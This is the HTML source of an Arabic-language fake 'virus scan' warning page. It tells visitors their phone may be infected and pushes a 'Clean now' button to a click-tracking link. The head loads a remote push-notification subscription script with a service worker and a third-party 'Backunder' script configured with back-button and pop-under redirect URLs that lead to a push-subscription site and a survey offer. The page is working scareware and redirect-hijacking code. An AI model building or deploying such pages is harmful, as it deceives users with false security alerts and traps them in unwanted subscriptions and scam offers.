<!DOCTYPE html>
<html>
<head>
	<meta http-equiv="content-type" content="text/html;charset=utf-8">
	<title>Warning | Virus Scan 2023</title>
	<link rel="icon" type="image/ico" href="dummy-favicon.ico">
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta name="theme-color" content="#ffffff">
	<script>
    var s = document.createElement('script');
    s.src='//redrotou.net/pfe/current/micro.tag.min.js?z=5795779'+'&sw=/sw-check-permissions-932df.js';
    s.onload = function(result) {
        switch (result) {
            case 'onPermissionDefault':break;
            case 'onPermissionAllowed':break;
            case 'onPermissionDenied':break;
            case 'onAlreadySubscribed':break;
            case 'onNotificationUnsupported':break;
        }
    }
    document.head.appendChild(s);
</script>

	<script>
    	var back = 'https://safe.consumerpush.online/?utm_medium=50163f6740ba8f8030865eac36888f9812e0f07d&utm_campaign=Push_Sub_Test_Link';
    	var under = 'https://wheekriesurvey.space/finance-survey.html?z=5613691&offer_id=2025&var={SOURCE_ID}&ymid={CLICK_ID}';
	</script>
	<script src="https://cdn.jsdelivr.net/gh/ocerodm/Backunder/backunder.min.js"></script>
	<style>
		*,
		html {
			box-sizing: border-box
		}

		body {
			background-color: #fff;
			font-family: sans-serif;
			margin: 0
		}

		a,
		a:hover {
			text-decoration: none;
			outline: 0
		}

		.mb-0 {
			margin-bottom: 0
		}

		@keyframes vitrate {
			0% {
				transform: scale(1)
			}

			50% {
				transform: scale(0.95)
			}

			100% {
				transform: scale(1)
			}
		}

		@-webkit-keyframes vitrate {
			0% {
				transform: scale(1)
			}

			50% {
				transform: scale(0.95)
			}

			100% {
				transform: scale(1)
			}
		}

		.app-body {
			height: 100vh;
			width: 100vw;
			text-align: center;
			float: left;
			background: url(warning-bg.gif)
		}

		.app-body:before {
			content: '';
			width: 100vw;
			height: 100vh;
			position: absolute;
			top: 0;
			left: 0;
			background: rgba(0, 0, 0, 0.6);
			z-index: 9
		}

		.button {
			width: 80%;
			margin: auto;
			margin-top: 20px;
			margin-bottom: 0;
			min-height: 1px;
			padding: 15px 20px;
			border-radius: 5px;
			font-stretch: normal;
			font-size: 20px;
			line-height: normal;
			background-color: #108f15;
			text-align: center;
			color: #fff;
			font-family: sans-serif;
			animation: vitrate 1s infinite;
			cursor: pointer;
			border: 0;
			box-shadow: 0 0 6px rgba(0, 0, 0, .2)
		}

		#modal-cont {
			width: 100%;
			margin: 0;
			padding: 10px 5px;
			min-height: 185px;
			border-radius: 5px 5px 0 0;
			background-size: 100%;
			background: #e51405
		}

		#modal-cont img {
			width: 80px
		}

		#modal {
			background-color: #fff;
			width: 400px;
			border-radius: 5px 5px 0 0;
			position: absolute;
			left: 50%;
			top: 50%;
			transform: translate(-50%, -60%);
			z-index: 99;
			padding-bottom: 20px
		}

		@media (max-width:420px){
			#modal {
				width: 300px;
			}
		}

		#modal-cont p,
		#modal-cont .title {
			color: #fff;
			margin: 0;
			font-size: 17px
		}

		#modal-cont .disclaimer {
			font-size: 11px
		}

		#modal-cont .title {
			font-size: 25px;
			text-transform: uppercase
		}

		@media (orientation: landscape) and (max-width: 767px) {
			#modal {
				transform: translate(-50%, -50%);
				zoom: 90%
			}
		}

		@media (orientation: portrait) and (min-height: 568px) {
			#modal {
				width: 90%
			}
		}

		a.link {
			color: #9f9f9f;
			font-size: 11px;
			margin-top: 5px;
			display: inline-block;
		}

		body.ar {
			direction: rtl;
		}
	</style>
</head>

<body class="ar">


	<section class="app-body">
		<div id="modal">
			<div id="modal-cont">
				<img src="peligro.png" alt="">


				<h2 class="title">تحذير</h2>
				<p class="sub-title">قد يكون نظامك مصابا بالفيروسات</p>
				<p class="disclaimer">إذا لم تفعل ذلك ، يمكن أن تتلف بطاقة. قم بتنظيف وتسريع وحماية هاتفك الآن.</p>
			</div><a href="https://mesik.bemobtrcks.com/click"><button class="button">نظف الان</button></a>
			<div></div>
		</div>
	</section>
</body>
</html>
